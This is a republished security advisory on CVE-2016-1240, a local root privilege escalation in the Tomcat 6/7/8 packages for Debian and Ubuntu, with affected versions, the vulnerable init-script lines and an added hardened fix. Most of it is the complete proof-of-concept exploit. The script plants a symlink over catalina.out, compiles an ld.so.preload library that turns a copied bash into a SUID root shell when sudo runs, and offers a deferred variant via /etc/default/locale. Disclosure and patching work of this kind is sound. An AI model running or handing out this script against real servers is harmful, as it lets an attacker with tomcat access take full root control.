On 30 September 2016, legalhackers.com published an advisory on a Tomcat vulnerability, assigned CVE-2016-1240. Administrators of Debian-based Linux systems usually manage packages with apt-get; the Debian Tomcat package ships an init script, installed at /etc/init.d/tomcatN and run automatically once the deb package is set up, and this init script contains the vulnerability.
An attacker who already holds low-privilege access as the tomcat user can exploit it to obtain root on the system. Affected systems include Debian and Ubuntu; other systems that use the Debian packages may also be affected.
For details, see the following links:
http://legalhackers.com/advisories/tomcat-debpkgs-root-privilege-escalation-exploit-cve-2016-1240.html
https://security-tracker.debian.org/tracker/cve-2016-1240
Affected systems include Debian and Ubuntu; other systems that use the corresponding deb packages may also be affected. The affected Debian packages are:
Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1
Tomcat is an application server that runs on Apache and serves as a container for Servlet/JSP applications. Tomcat can be thought of as an extension of Apache, although in practice it can also run independently of Apache.
Tomcat is a Servlet container developed by the Jakarta project of the Apache Software Foundation. Following the technical specifications published by Sun Microsystems, it implements support for Servlets and JavaServer Pages (JSP) and provides some features of its own as a web server, such as the Tomcat management and control platform, security realm management, and Tomcat valves. Because Tomcat also contains an HTTP server, it can also be regarded as a stand-alone web server.
In the broad sense, Debian refers to a collaborative organization dedicated to building a free operating system, and to what it produces. Because the Linux monolithic kernel dominates among the Debian project's many core branches, and because the great majority of the basic tools in the operating system built by Debian developers come from the GNU project, "Debian" usually means Debian GNU/Linux.
The Tomcat security team has fixed the affected packages and advises users to upgrade to the latest version. The new versions can be downloaded from:
https://sources.debian.net/src/tomcat6/
https://sources.debian.net/src/tomcat7/
https://sources.debian.net/src/tomcat8/
A local attacker acting as the tomcat user (for example, after compromising a web application) who replaces catalina.out with a symlink pointing at an arbitrary system file can gain root privileges as soon as the Tomcat init script, which runs as root, reopens catalina.out on the next service restart. The relevant lines of the init script are:
```sh
# Run the catalina.sh script as a daemon
set +e
touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
```
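The two lines above follow whatever is at the catalina.out path, which is what the symlink attack relies on. The following is an added example (not code from the advisory or from the Debian package) of a hardened stand-in for that step: root checks that the path is a plain, correctly owned file before touching it and never follows a symlink when changing ownership. The function names `is_safe_logfile` and `prepare_logfile` are assumed for illustration, and GNU coreutils (`stat -c`) is assumed.

```shell
#!/bin/sh
# Added example, not part of the advisory or of the Debian package: a hardened
# stand-in for the "touch ...; chown ..." step of the init script shown above.
# Root refuses to act on anything at the log path that is not a plain file
# owned by root or by the service user, so a symlink planted by the tomcat
# account is never followed with root privileges.  Assumes GNU coreutils.

# is_safe_logfile PATH OWNER  (OWNER is a user name or numeric uid)
# Returns 0 when PATH is absent, or is a regular file (not a symlink) owned by
# root or by OWNER; returns 1 otherwise and says why on stderr.
is_safe_logfile() {
    path=$1
    owner=$2
    # Test -L before -f: -f follows symlinks and would accept the redirect.
    if [ -L "$path" ]; then
        echo "refusing: $path is a symlink to $(readlink "$path")" >&2
        return 1
    fi
    [ -e "$path" ] || return 0      # nothing there yet; touch may create it
    if [ ! -f "$path" ]; then
        echo "refusing: $path is not a regular file" >&2
        return 1
    fi
    case $owner in
        *[!0-9]*) want_uid=$(id -u "$owner") ;;   # name -> uid
        *)        want_uid=$owner ;;              # already numeric
    esac
    cur_uid=$(stat -c %u "$path")
    if [ "$cur_uid" = 0 ] || [ "$cur_uid" = "$want_uid" ]; then
        return 0
    fi
    echo "refusing: $path is owned by uid $cur_uid, not root or $owner" >&2
    return 1
}

# prepare_logfile PATH OWNER
# Hardened equivalent of the two vulnerable lines:
#   touch "$CATALINA_BASE"/logs/catalina.out
#   chown $TOMCAT7_USER "$CATALINA_BASE"/logs/catalina.out
# chown -h changes the owner of a link itself rather than its target, so a
# symlink appearing between the check and the chown gains nothing.
prepare_logfile() {
    is_safe_logfile "$1" "$2" || return 1
    touch "$1" && chown -h "$2" "$1"
}
```

A window still exists between the check and the touch, so the robust fix is for root never to create or chown files inside a directory the service account can write to; let the tomcat user create its own log file (for example by running that step through start-stop-daemon --chuid).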
The proof-of-concept exploit published with the advisory:

------[ tomcat-rootprivesc-deb.sh ]------

```bash
#!/bin/bash
#
# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
#
# CVE-2016-1240
#
# Discovered and coded by:
#
# Dawid Golunski
# http://legalhackers.com
#
# This exploit targets Tomcat (versions 6, 7 and 8) packaging on
# Debian-based distros including Debian, Ubuntu etc.
# It allows attackers with a tomcat shell (e.g. obtained remotely through a
# vulnerable java webapp, or locally via weak permissions on webapps in the
# Tomcat webroot directories etc.) to escalate their privileges to root.
#
# Usage:
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
#
# The exploit can used in two ways:
#
# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.
# It also gives attacker a chance to execute: kill [Tomcat-pid] command to force/speed up
# a Tomcat restart (done manually by an admin, or potentially by some Tomcat service watchdog etc.)
#
# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
# then add arbitrary commands to the file which will be executed with root privileges by
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default
# Ubuntu/Debian Tomcat installations).
#
# See full advisory for details at:
# http://legalhackers.com/advisories/tomcat-debpkgs-root-privilege-escalation-exploit-cve-2016-1240.html
#
# Disclaimer:
# For testing purposes only. Do no harm.
#

BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/tomcatrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

function cleanexit {
	# Cleanup
	echo -e "\n[+] Cleaning up..."
	rm -f $PRIVESCSRC
	rm -f $PRIVESCLIB
	rm -f $TOMCATLOG
	touch $TOMCATLOG
	if [ -f /etc/ld.so.preload ]; then
		echo -n > /etc/ld.so.preload 2>/dev/null
	fi
	echo -e "\n[+] Job done. Exiting with code $1 \n"
	exit $1
}

function ctrl_c() {
	echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
	cleanexit 0
}

#intro
echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"

# Args
if [ $# -lt 1 ]; then
	echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"
	exit 3
fi
if [ "$2" = "-deferred" ]; then
	mode="deferred"
else
	mode="active"
fi

# Priv check
echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"
id | grep -q tomcat
if [ $? -ne 0 ]; then
	echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"
	exit 3
fi

# Set target paths
TOMCATLOG="$1"
if [ ! -f $TOMCATLOG ]; then
	echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"
	exit 3
fi
echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"


# [ Deferred exploitation ]

# Symlink the log file to /etc/default/locale file which gets executed daily on default
# Tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.
# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been
# restarted and file owner gets changed.
if [ "$mode" = "deferred" ]; then
	rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG
	if [ $? -ne 0 ]; then
		echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
		cleanexit 3
	fi
	echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
	echo -e "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"
	echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"
	echo -ne "\n    you'll be able to add arbitrary commands to the file which will get executed with root privileges"
	echo -ne "\n    at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\n\n"
	exit 0
fi


# [ Active exploitation ]

trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
uid_t geteuid(void) {
	static uid_t  (*old_geteuid)();
	old_geteuid = dlsym(RTLD_NEXT, "geteuid");
	if ( old_geteuid() == 0 ) {
		chown("$BACKDOORPATH", 0, 0);
		chmod("$BACKDOORPATH", 04777);
		unlink("/etc/ld.so.preload");
	}
	return old_geteuid();
}
_solibeof_
gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl
if [ $? -ne 0 ]; then
	echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
	cleanexit 2;
fi

# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"

# Safety check
if [ -f /etc/ld.so.preload ]; then
	echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
	cleanexit 2
fi

# Symlink the log file to ld.so.preload
rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG
if [ $? -ne 0 ]; then
	echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
	cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"

# Wait for Tomcat to re-open the logs
echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..."
echo -e "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)"
while :; do
	sleep 0.1
	if [ -f /etc/ld.so.preload ]; then
		echo $PRIVESCLIB > /etc/ld.so.preload
		break;
	fi
done

# /etc/ld.so.preload file should be owned by tomcat user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo --help 2>/dev/null >/dev/null

# Check for the rootshell
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
	echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
	echo -e "\n\033[94mPlease tell me you're seeing this too ;) \033[0m"
else
	echo -e "\n[!] Failed to get root"
	cleanexit 2
fi

# Execute the rootshell
echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p

# Job done.
cleanexit 0
```

--------------[ eof ]--------------------
This security advisory is intended only to describe potential security issues; NSFOCUS provides no guarantee or commitment in connection with it. Any direct or indirect consequences or losses arising from the dissemination or use of the information in this advisory are the sole responsibility of the user; neither NSFOCUS nor the advisory's authors accept any liability for them. NSFOCUS reserves the right to modify and interpret this advisory. Anyone reproducing or distributing this advisory must preserve it in its entirety, including the copyright notice. Without NSFOCUS's permission, its content may not be altered, extended or abridged, nor used for commercial purposes in any way.
Original publication date: 24 March 2017
Published by: NSFOCUS; copyright remains with the original author
Original link: http://toutiao.secjia.com/tomcat-root-privilege-escalation-exploit-cve-2016-1240
This article comes from 安全加 (secjia), a partner of the Yunqi Community; follow the 安全加 website for related information.